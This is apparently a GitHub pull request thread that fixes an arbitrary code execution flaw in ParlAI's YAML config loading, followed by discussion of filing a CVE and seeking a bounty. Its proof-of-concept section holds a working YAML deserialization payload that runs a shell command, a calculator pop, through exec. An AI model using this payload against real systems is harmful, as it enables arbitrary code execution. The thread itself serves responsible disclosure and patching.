Security Fix for Arbitrary Code Execution - huntr.dev

[huntr-helper]

https://huntr.dev/users/Anon-Artist has fixed the Arbitrary Code Execution vulnerability 🔨. Think you could fix a vulnerability like this?

Get involved at https://huntr.dev/

Q | A
Version Affected | ALL
Bug Fix | YES
Original Pull Request | 418sec#1
Vulnerability README | https://github.com/418sec/huntr/blob/master/bounties/pip/ParlAI/1/README.md

User Comments:

📊 Metadata *

ParlAI (pronounced “par-lay”) is a python framework for sharing, training and testing dialogue models, from open-domain chitchat to VQA (Visual Question Answering).

Bounty URL: https://www.huntr.dev/bounties/1-pip-ParlAI

⚙️ Description *

This package was vulnerable to YAML deserialization attack caused by unsafe loading.

💻 Technical Description *

Fixed by avoiding unsafe loader.

🐛 Proof of Concept (PoC) *

Create the following PoC file:
exploit.py

import os
#os.system('pip3 install parlai')
from parlai.chat_service.utils import config
exploit = """!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""
open('config.yml','w+').write(exploit)
config.parse_configuration_file('config.yml')

Execute the following commands in another terminal:

python3 exploit.py

Check the Output:

xcalc will pop up.

🔥 Proof of Fix (PoF) *

After fix it will not popup a calc.

👍 User Acceptance Testing (UAT)

After fix functionality is unaffected.

[facebook-github-bot]

Hi @huntr-helper!

Thank you for your pull request and welcome to our community.

Action Required

In order to merge any pull request (code, docs, etc.), we require contributors to sign our Contributor License Agreement, and we don't seem to have one on file for you.

Process

In order for us to review and merge your suggested changes, please sign at https://code.facebook.com/cla. If you are contributing on behalf of someone else (eg your employer), the individual CLA may not be sufficient and your employer may need to sign the corporate CLA.

Once the CLA is signed, our tooling will perform checks and validations. Afterwards, the pull request will be tagged with CLA signed. The tagging process may take up to 1 hour after signing. Please give it that time before contacting us about it.

If you have received this in error or have any questions, please contact us at cla@fb.com. Thanks!

[facebook-github-bot]

Thank you for signing our Contributor License Agreement. We can now accept your code for this (and any) Facebook open source project. Thanks!

[stephenroller]

I guess it's fine? Thanks for the fix.

Not really sure what the risk is. Configs are specified by the devops team. If you had write access to that file, you assumedly can already execute arbitrary code, but I guess one could theoretically chain exploits.

[Anon-Artist]

@stephenroller Yeah for more info you can read this
https://www.google.com/url?sa=t&source=web&rct=j&url=https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf%3Futm_source%3Ddlvr.it%26utm_medium%3Dtwitter%23:~:text%3Dyaml%2520use%2520similar%2520methods%2520as%2520PyYAML%2520to%2520deserialize%2520data.%26text%3D%252C%2520preserve_quotes%253DNone)-,safe_load()%2520Deserialize%2520data%2520with%2520Loader%253DSafeLoader%2520by%2520default%2520and,stream%252C%2520Loader%253DSafeLoader).&ved=2ahUKEwjZv-7Omr_uAhVh7HMBHUqvBksQFjABegQIAhAF&usg=AOvVaw1DxHHi2lrH6e6jz7dSulo1&cshid=1611856887707

[JamieSlome]

@stephenroller, if you want more security fixes and patches like this in the future, you can let security researchers know that they can win bounties protecting your repository by copying this small code snippet into your README.md:

[![huntr](https://cdn.huntr.dev/huntr_security_badge_mono.svg)](https://huntr.dev)

👇 👇 👇

[Anon-Artist]

Hi @stephenroller i would like to seek for a help from you
I was so busy in these days recently i noticed that the same bug in tensorflow got a CVE CVE-2021-37678 so could you please help me to get a CVE for this repo too

Iam attaching the CVE details along with it to make you clear about the impact of this bug
Thanks
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37678
https://portswigger.net/daily-swig/amp/deserialization-bug-in-tensorflow-machine-learning-framework-allowed-arbitrary-code-execution

[stephenroller]

Okay, I've never done that before. What's the process?

[Anon-Artist]

Hey Thanks a lot i am happy to guide you on this.
I will add a screenshot of details
Go to https://github.com/facebookresearch/ParlAI
Go to security -> Go to Security Advisory -> click new draft security advisoroies
Then provide the informations ( i will add screenshot


In Description provide this
""

Impact

The package was vulnerable to YAML deserialization attack caused by unsafe loading which leads to Arbitary code execution.

Patches

The security bug is patched by avoiding unsafe loader it was discovered and patched by Abhiram V, aka @Anon-Artist.
The Users should update to version above v1.1.0

Workarounds

Users can change the Loader used to SafeLoader otherwise they should update parlai to version above v1.1.0
507d066

References

#3402
https://anon-artist.github.io/blogs/blog3.html
""

[Anon-Artist]

@stephenroller You can refer this too

GHSA-r6jx-9g48-2r5r

In Title provide this
Arbitrary code execution due to YAML deserialization
Instead of
Deserialization of untrusted data in parlai

[stephenroller]

Thanks for the details. Will do it this week and ping on this thread.

[Anon-Artist]

Hi @stephenroller any updates on this.
I hope you had a nice weekend
Thanks.

[stephenroller]

Thanks for following up. Our repos are managed by a dedicated team (meaning I'm not an Admin and I can't file the CVE). I've created in an internal ticket to file it.

[Anon-Artist]

Thank you so much @stephenroller , from where i get the updates then

[stephenroller]

We'll continue to use this thread for updates.

[stephenroller]

Hi @Anon-Artist. The CVE issuing has been bubbled up to Facebook's internal security team. Unfortunately, things were mishandled due to my own failures, but are in the process of being corrected.

[Anon-Artist]

No problem @stephenroller I hope everything will be fine and THANK YOU

[Anon-Artist]

Hi @stephenroller got CVE and published the advisory today Thank you so much for your help on that
Let me ask one more thing
May i know do i get any bounty for this.

[stephenroller]

Unfortunately, I don't know about eligibility for a bounty. In the future, please use the official facebook bounty to report security vulnerabilities with any facebook product or github repository, so that the security team can evaluate for eligibility.

You can try to file one now and see if you get lucky though. Provide them with the CVE, this github link, and the FB internal ticket number T100033008, and maybe they can help, but I cannot promise.

[Anon-Artist]

Thanks alot @stephenroller could you please guide me its my first time

[stephenroller]

Go here and fill it out to the best of your ability: https://www.facebook.com/whitehat/report/, adding the info suggested where possible.